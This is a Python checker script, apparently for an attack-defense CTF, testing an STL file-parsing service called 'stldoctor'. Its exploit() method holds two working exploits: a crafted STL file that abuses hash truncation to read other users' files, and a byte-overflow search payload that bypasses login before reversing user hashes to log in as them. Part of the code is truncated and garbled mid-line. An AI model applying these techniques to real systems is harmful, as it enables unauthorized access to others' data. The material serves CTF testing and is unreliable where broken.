#!/usr/bin/env python3 from enochecker import BaseChecker, BrokenServiceException, EnoException, run from enochecker.utils import SimpleSocket, assert_equals, assert_in import math, os, random, string, struct, subprocess, logging, selectors, time, socket import numpy as np logging.getLogger("faker").setLevel(logging.WARNING) logging.getLogger("pwnlib").setLevel(logging.WARNING) logging.getLogger("_curses").setLevel(logging.CRITICAL) rand = random.SystemRandom() from faker import Faker # DEBUGING MEMORY ISSUES# import tracemalloc, signal tracemalloc.start() def handler(signum, frame): print("Received SIG!") snapshot = tracemalloc.take_snapshot() top_stats = snapshot.statistics('lineno') open(f"malloc-log-{os.getpid()}", "w+").write("\n".join([str(v) for v in top_stats[:10]])) signal.signal(signal.SIGALRM, handler) # END DEBUG # evil_file = b""" solid test\xff facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid test\xff """ generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" def ensure_bytes(v): if type(v) == bytes: return v elif type(v) == str: return v.encode() else: raise BrokenServiceException("Tried to pass non str/bytes to bytes arg") class STLDoctorChecker(BaseChecker): service_name = "stldoctor" port = 9090 flag_variants = 2 noise_variants = 2 havoc_variants = 8 exploit_variants = 2 prompt = b"$ " def openconn(self): conn = self.connect() resp = conn.recvuntil(self.prompt) return conn def closeconn(self, conn): self.debug("Sending exit command") conn.write("exit\n") # ensure it is a clean exit conn.recvuntil("bye!") conn.close() def fakeid(self): fake = Faker(["en_US"]) idstr = "".join([c for c in fake.name().replace(' ','') if c in generic_alphabet][:12]).ljust(10, '.') idstr += "".join([rand.choice(generic_alphabet) for i in range(8)]) return idstr def havocid(self): idlen = rand.randint(10, 40) return "".join([chr(rand.randint(32, 127)) for i in range(idlen)]) def do_auth(self, conn, authstr): authstr = ensure_bytes(authstr) self.debug(f"Logging in with {authstr}") conn.write("auth\n") conn.write(authstr + b"\n") resp = conn.recvuntil(self.prompt) assert_in(b"Success!", resp, f"Login with pass {authstr} failed"); def check_listed(self, conn, modelid): modelid = ensure_bytes(modelid) conn.write("list\n") resp = conn.recvuntil(self.prompt) assert_in(modelid, resp, f"Uploaded model {modelid} is missing from list command") def querydb(self, *args): vals = [] for arg in args: try: val: str = self.chain_db[arg] except KeyError as ex: raise BrokenServiceException(f"Invalid db contents, missing: {arg}") vals.append(val) return vals def postdb(self, **kwdict): self.chain_db = kwdict def reverse_hash(self, hashstr): return subprocess.check_output([os.getenv("REVHASH_PATH"), hashstr])[:-1] def genfile_ascii(self, solidname, malformed=False): solidname = ensure_bytes(solidname) randchoice = rand.randint(0,2) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" facet_count = rand.randint(4, 30) indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))]) for fi in range(facet_count): if malformed and randchoice == 0: # malformed by wrong keyword content += indent * 1 + b"facet nornal " else: content += indent * 1 + b"facet normal " vs = [[rand.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" if malformed and randchoice == 1: # malformed wrong keyword case content += indent * 2 + b"outer lOop\n" else: content += indent * 2 + b"outer loop\n" for i in range(3): content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" content += indent * 2 + b"endloop\n" content += indent + b"endfacet\n" if malformed and randchoice == 2: content += b"" # malformed since no endsolid else: if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(self, solidname, malformed=False): solidname = ensure_bytes(solidname) randchoice = rand.randint(0, 3) if len(solidname) > 78: raise EnoException("Solidname to embed in header is larger than header itself") if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 facet_count = rand.randint(4, 30) if malformed and randchoice == 0: # malform by specifying more facets than are in the file content += struct.pack(" None if self.variant_id == 0: conn = self.openconn() modelname = self.fakeid() stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype = "ascii") self.closeconn(conn) self.postdb(modelid=modelid, modelname=modelname) elif self.variant_id == 1: conn = self.openconn() modelname = self.fakeid() authstr = self.fakeid() self.do_auth(conn, authstr) stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype = "bin") self.closeconn(conn) self.postdb(modelid=modelid, modelname=modelname, auth=authstr) else: raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided") def getflag(self): # type: () -> None if self.variant_id == 0: modelid, modelname = self.querydb("modelid", "modelname") conn = self.openconn() resp = self.getfile(conn, modelname.encode()) assert_in(self.flag.encode(), resp, "Flag not found in file info nor contents") self.closeconn(conn) elif self.variant_id == 1: modelid, modelname, authstr = self.querydb("modelid", "modelname", "auth") conn = self.openconn() self.do_auth(conn, authstr) resp = self.getfile(conn, modelname.encode()) assert_in(self.flag.encode(), resp, "Flag not found in file info nor contents") self.closeconn(conn) else: raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided") def putnoise(self): # type: () -> None if self.variant_id == 0: conn = self.openconn() modelname = self.fakeid() solidname = self.fakeid() contents, modelid = self.putfile(conn, modelname, solidname, "bin") self.closeconn(conn) self.postdb(modelid=modelid, modelname=modelname, solidname=solidname, contents=contents) elif self.variant_id == 1: conn = self.openconn() authstr = self.fakeid() modelname = self.fakeid() solidname = self.fakeid() self.do_auth(conn, authstr) contents, modelid = self.putfile(conn, modelname, solidname, "ascii") self.closeconn(conn) self.postdb(modelid=modelid, modelname=modelname, solidname=solidname, contents=contents, auth=authstr) else: raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided") def getnoise(self): # type: () -> None if self.variant_id == 0: modelid, modelname, solidname, contents = self.querydb("modelid", "modelname", "solidname", "contents") conn = self.openconn() self.check_getfile(conn, modelname, solidname, contents, modelid) self.closeconn(conn) elif self.variant_id == 1: modelid, modelname, solidname, contents, authstr = self.querydb("modelid", "modelname", "solidname", "contents", "auth") conn = self.openconn() self.do_auth(conn, authstr) self.check_getfile(conn, modelname, solidname, contents, modelid) self.closeconn(conn) else: raise EnoException(f"Invalid noise variant ({self.variant_id}) provided") def havoc(self): # type: () -> None if self.variant_id == 0: self.havoc_upload('ascii', False) elif self.variant_id == 1: self.havoc_upload('bin', False) elif self.variant_id == 2: self.havoc_upload('ascii', True) elif self.variant_id == 3: self.havoc_upload('bin', True) elif self.variant_id == 4: self.malformed_upload('ascii') elif self.variant_id == 5: self.malformed_upload('bin') elif self.variant_id == 6: self.malformed_upload('garbage') elif self.variant_id == 7: self.malformed_upload('garbage-tiny') else: raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided") def exploit(self): # type: () -> None if self.variant_id == 0: name = self.fakeid() # Upload evil file for parse via search for hash truncation conn = self.openconn() resp,mid = self.putfile(conn, name, name, stlfile=evil_file) self.debug(f"Uploaded evil file with id {mid}") resp = self.getfile(conn, name, download=False) conn.write("search last\n") filelist = [l.strip().split(b" : ")[1] for l in conn.recvuntil("? ").split(b"\n") if b" : " in l] if len(filelist) == 0: raise BrokenServiceException("Failed to list files through search") # Use it to enumerate other files and grab contents found = None self.debug("Targets:\n" + "\n".join([' - ' + l.decode('latin1') for l in filelist])) for i, fhash in enumerate(filelist): self.debug(f"Retrieving file {fhash} at index {i}") conn.write(f"{i}\nn\n") resp = conn.recvuntil("==================") resp += conn.recvuntil("? ") found = self.search_flag_bytes(resp) if found is not None or i == len(filelist) - 1: break conn.write("q\n") conn.recvuntil(self.prompt) self.closeconn(conn) if found is None: raise BrokenServiceException("Exploit for flagstore 1 failed") return found elif self.variant_id == 1: # Overflow loggedin variable conn = self.openconn() conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") conn.recvuntil(self.prompt) conn.write("auth\n") assert_in(b"Already logged in!", conn.recvuntil(self.prompt), "Exploit did not set 'loggedin' variable via overflow") conn.write("list\n") resp = conn.recvuntil(self.prompt) self.debug("List response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] if len(users) == 0: raise BrokenServiceException("Unable to list private user hashes") self.closeconn(conn) # Login as each private user found = None for u in users: conn = self.openconn() self.debug(f"Logging in as user with id {u}") user = self.reverse_hash(u.decode()) if user == b"": raise BrokenServiceException("Failed to find hash preimage") conn.write(b"auth " + user + b"\n") resp = conn.recvuntil(self.prompt) if b"Welcome back" not in resp: self.closeconn(conn) continue # NOTE: dont raise an exception, could be that user dir was cleaned up just # before we logged in, not necessarily because of invalid prehash # raise EnoException(f"Reversing of hash {u} returned invalid preimage {user}") conn.write("list\n") resp = conn.recvuntil(self.prompt) names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]) self.closeconn(conn) found = self.search_flag_bytes(names) if found is not None: break if found is None: raise BrokenServiceException("Exploit for flagstore 2 failed") return found else: raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided") app = STLDoctorChecker.service # This can be used for uswgi. if __name__ == "__main__": run(STLDoctorChecker)